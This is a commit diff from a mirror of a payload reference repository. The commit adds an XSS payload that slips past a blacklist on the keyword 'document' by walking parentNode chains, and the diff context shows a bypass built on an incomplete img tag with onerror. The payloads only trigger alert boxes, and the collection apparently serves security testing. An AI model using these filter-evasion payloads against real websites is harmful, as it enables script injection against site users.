mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-02-07 07:22:13 +00:00
XSS Payload - bypass document blacklisted keyword
This commit is contained in:
parent
0a0abd8a9d
commit
eecfc69c08
@ -422,6 +422,10 @@ Bypass with incomplete html tag - IE/Firefox/Chrome/Safari
|
|||||||
<img src='1' onerror='alert(0)' <
|
<img src='1' onerror='alert(0)' <
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Bypass document blacklist
|
||||||
|
```
|
||||||
|
<div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script>
|
||||||
|
```
|
||||||
|
|
||||||
Bypass using javascript inside a string
|
Bypass using javascript inside a string
|
||||||
```
|
```
|
||||||
|
Loading…
Reference in New Issue
Block a user